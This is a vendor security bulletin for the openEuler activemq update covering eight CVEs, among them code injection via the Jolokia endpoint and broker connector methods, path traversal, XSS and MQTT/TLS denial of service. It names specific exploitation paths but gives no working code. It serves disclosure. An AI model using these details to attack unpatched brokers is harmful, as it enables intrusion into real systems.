SB2026050349 - openEuler 24.03 LTS SP1 update for activemq
Published: May 3, 2026
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 8 secuirty vulnerabilities.
1) Path traversal (CVE-ID: CVE-2026-33227)
The vulnerability allows a remote user to load unintended classpath resources.
The vulnerability exists due to path traversal in Stomp consumer creation and Web console message browsing when processing an authenticated user-supplied key value. A remote user can supply a crafted key value to load unintended classpath resources.
The issue occurs in two instances: when creating a Stomp consumer and when browsing messages in the Web console, and it could potentially be chained with another attack to lead to further exploit.
2) Code Injection (CVE-ID: CVE-2026-34197)
The vulnerability allows a remote user to execute arbitrary code.
The vulnerability exists due to code injection in the Jolokia JMX-HTTP bridge and exposed ActiveMQ MBeans when handling authenticated exec operations with a crafted discovery URI. A remote user can invoke BrokerService.addNetworkConnector(String) or BrokerService.addConnector(String) to execute arbitrary code.
The issue is exposed through the web console endpoint at /api/jolokia/, and exploitation causes remote Spring XML application context loading via the VM transport's brokerConfig parameter before configuration validation completes.
3) Improper Check or Handling of Exceptional Conditions (CVE-ID: CVE-2026-39304)
The vulnerability allows a remote attacker to cause a denial of service.
The vulnerability exists due to improper handling of TLSv1.3 KeyUpdate messages in ActiveMQ NIO SSL transports when processing client-triggered TLSv1.3 handshake KeyUpdates. A remote attacker can rapidly trigger KeyUpdate messages to cause a denial of service.
Only TLSv1.3 is vulnerable to out-of-memory exhaustion; earlier TLS versions may cause a connection hang instead.
4) Integer overflow (CVE-ID: CVE-2026-40046)
The vulnerability allows a remote attacker to cause a denial of service.
The vulnerability exists due to integer overflow or wraparound in the MQTT control packet remaining length field handling when parsing MQTT control packets. A remote attacker can send a specially crafted MQTT control packet to cause a denial of service.
5) Code Injection (CVE-ID: CVE-2026-40466)
The vulnerability allows a remote user to execute arbitrary code.
The vulnerability exists due to improper input validation and code injection in BrokerView.addNetworkConnector and BrokerView.addConnector through Jolokia when adding a connector using an HTTP discovery transport. A remote user can add a connector that causes a malicious HTTP endpoint to return a VM transport and load a remote Spring XML application context to execute arbitrary code.
Exploitation requires the activemq-http module to be on the classpath.
6) Cross-site scripting (CVE-ID: CVE-2026-41043)
The vulnerability allows a remote user to inject malicious content into the web console.
The vulnerability exists due to cross-site scripting in ActiveMQ Web Console when browsing queues. A remote user can inject HTML into a JMS selector field and override the content type to HTML to inject malicious content into the web console.
The issue is triggered while browsing queues in the web console.
7) Code Injection (CVE-ID: CVE-2026-41044)
The vulnerability allows a remote user to execute arbitrary code.
The vulnerability exists due to improper input validation and code injection in the admin web console and DestinationView MBean when processing a malicious broker name and triggering VM transport creation. A remote user can construct a malicious broker name and send a message through the DestinationView MBean to execute arbitrary code.
Exploitation requires access to the admin web console and the DestinationView MBean exposed by Jolokia.
8) Integer overflow (CVE-ID: CVE-2025-66168)
The vulnerability allows a remote user to perform a denial of service attack.
The vulnerability exists due to integer overflow within the MQTT module when decoding malformed packets. A remote user can send specially crafted packets to the application, trigger an integer overflow and perform a denial of service attack. Note, the vulnerability does not affect brokers with not enabled MQTT transport connectors.
Remediation
Install update from vendor's website.